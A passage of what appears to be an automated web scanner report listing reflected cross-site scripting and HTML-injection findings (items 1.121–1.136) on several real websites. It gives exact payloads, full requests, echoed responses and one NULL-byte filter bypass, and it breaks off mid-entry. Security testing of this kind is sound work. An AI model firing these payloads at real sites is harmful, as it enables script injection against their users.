HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:10:49 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:10:50 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1" title="Ultimate College Softball | Site Profile">
...[SNIP]...

1.121. http://boardreader.com/site/mntdiat_mai_aigi_7486781.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/mntdiat_mai_aigi_7486781.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1ca"><script>alert(1)</script>c60cedb11b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1" title=".............. ...... ........ | Site Profile">
...[SNIP]...

1.122. http://consumershealthyliving.com/clinical-study.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://consumershealthyliving.com
Path:   /clinical-study.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15882"><a>3a9ae0f5291 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /clinical-study.html?15882"><a>3a9ae0f5291=1 HTTP/1.1
Host: consumershealthyliving.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: af0de5e19d0aeec9236a3a01ce912df8=n0799snp41r1h1s86rdk7kmg30; path=/
Last-Modified: Tue, 01 Feb 2011 15:31:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<a href="http://consumershealthyliving.com/clinical-study.html?15882"><a>3a9ae0f5291=1&amp;fontstyle=f-larger" title="Increase Font Size" class="large">
...[SNIP]...

1.123. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0082f2d<a>e2e94140c60 was submitted in the REST URL parameter 1. This input was echoed as 82f2d<a>e2e94140c60 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%0082f2d<a>e2e94140c60/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:00 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>e2e94140c60/">weblog%0082f2d<a>e2e94140c60</a>
...[SNIP]...

1.124. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5fd5"><script>alert(1)</script>73be2182441 was submitted in the REST URL parameter 1. This input was echoed as b5fd5"><script>alert(1)</script>73be2182441 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00b5fd5"><script>alert(1)</script>73be2182441/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:32:59 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00b5fd5"><script>alert(1)</script>73be2182441/2006/">
...[SNIP]...

1.125. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 269cf<a>57679d84bdc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/again269cf<a>57679d84bdc/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Tue, 01 Feb 2011 15:33:37 GMT
Last-Modified: Tue, 01 Feb 2011 15:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/again269cf<a>57679d84bdc/</h1>
...[SNIP]...

1.126. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b483d"><script>alert(1)</script>e257170cefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b483d\"><script>alert(1)</script>e257170cefc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?b483d"><script>alert(1)</script>e257170cefc=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:16 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Tue, 01 Feb 2011 15:32:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 213693

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?b483d\"><script>alert(1)</script>e257170cefc=1#preview" method="post">
...[SNIP]...

1.127. http://ds.addthis.com/red/psi/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 592e2<script>alert(1)</script>9fd54abbf1d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr592e2<script>alert(1)</script>9fd54abbf1d HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 311
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Feb 2011 15:32:28 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 02 May 2011 15:32:28 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 03 Mar 2011 15:32:28 GMT; Path=/
Set-Cookie: di=%7B%7D..1296574348.19F|1296574348.19A; Domain=.addthis.com; Expires=Thu, 31-Jan-2013 04:49:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 01 Feb 2011 15:32:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 01 Feb 2011 15:32:28 GMT
Connection: close

_ate.ad.hpr592e2<script>alert(1)</script>9fd54abbf1d({"urls":["http://segment-pixel.invitemedia.com/pixel?pixelID=38582&partnerID=169&key=segment","http://segment-pixel.invitemedia.com/pixel?pixelID=15694&partnerID=169&key=segment"],"segments" : ["19F",
...[SNIP]...

1.128. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ehow.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1cee6<script>alert(1)</script>ded05b5064d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.ehow.com/p.json?callback=_ate.ad.hpr1cee6<script>alert(1)</script>ded05b5064d&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ehow.com%2Fcomputer-software%2F&ref=http%3A%2F%2Fburp%2Fshow%2F4&o1jt6o HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296507257.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 290
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 02 Feb 2011 15:32:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 04 Mar 2011 15:32:00 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296660720.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 11:36:19 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 15:32:00 GMT
Connection: close

_ate.ad.hpr1cee6<script>alert(1)</script>ded05b5064d({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ehow.com%2fcomputer-software%2f"],"segments" : ["60"],"loc": "MjAwMD
...[SNIP]...

1.129. http://gocitykids.parentsconnect.com/data/service-calendar.json [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gocitykids.parentsconnect.com
Path:   /data/service-calendar.json

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c49f0<script>alert(1)</script>f5a6d19584e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /data/service-calendar.json?widget_query=true&zipcode=All&year=2009&month=10&day=12&max=4&widget_category_id=0&widget_category=All&jsoncallback=jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e&_=1255386319932 HTTP/1.1
Host: gocitykids.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Language: en
Content-Type: text/json;charset=UTF-8
Content-Length: 20190
Date: Wed, 02 Feb 2011 19:21:09 GMT
Connection: close

jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e(
[{"id":"211700","name":"Groundhog Day (PG)","attractionAlias":"the-colonial-theatre-227-bridge-street-phoenixville-pa-19460-3449-us","phone":"610.917.0223; 610.917.1228","url":"http://www.thecoloni
...[SNIP]...

1.130. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-soup

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9deb'-alert(1)-'530e4bffa2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/database-soup?e9deb'-alert(1)-'530e4bffa2c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%26e9deb'-alert(1)-'530e4bffa2c%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.131. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9726'-alert(1)-'362cf24ba31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/database-talk?e9726'-alert(1)-'362cf24ba31=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26e9726'-alert(1)-'362cf24ba31%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.132. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2luw

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29327'-alert(1)-'14b42306d5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/db2luw?29327'-alert(1)-'14b42306d5d=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%2629327'-alert(1)-'14b42306d5d%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.133. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2zos

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2553e'-alert(1)-'a0a7b564b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/db2zos?2553e'-alert(1)-'a0a7b564b7=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78368
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%262553e'-alert(1)-'a0a7b564b7%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.134. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/elsua

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3acb'-alert(1)-'93981464ca0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/elsua?f3acb'-alert(1)-'93981464ca0=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64515
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
er != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26f3acb'-alert(1)-'93981464ca0%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.135. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/juice-analytics

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79855'-alert(1)-'e9a3a93587c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/juice-analytics?79855'-alert(1)-'e9a3a93587c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61934
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
tnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%2679855'-alert(1)-'e9a3a93587c%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

1.136. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/minimalit

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3719a'-alert(1)-'3be2065b10e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/minimalit?3719a'-alert(1)-'3be2065b10e=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60105
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
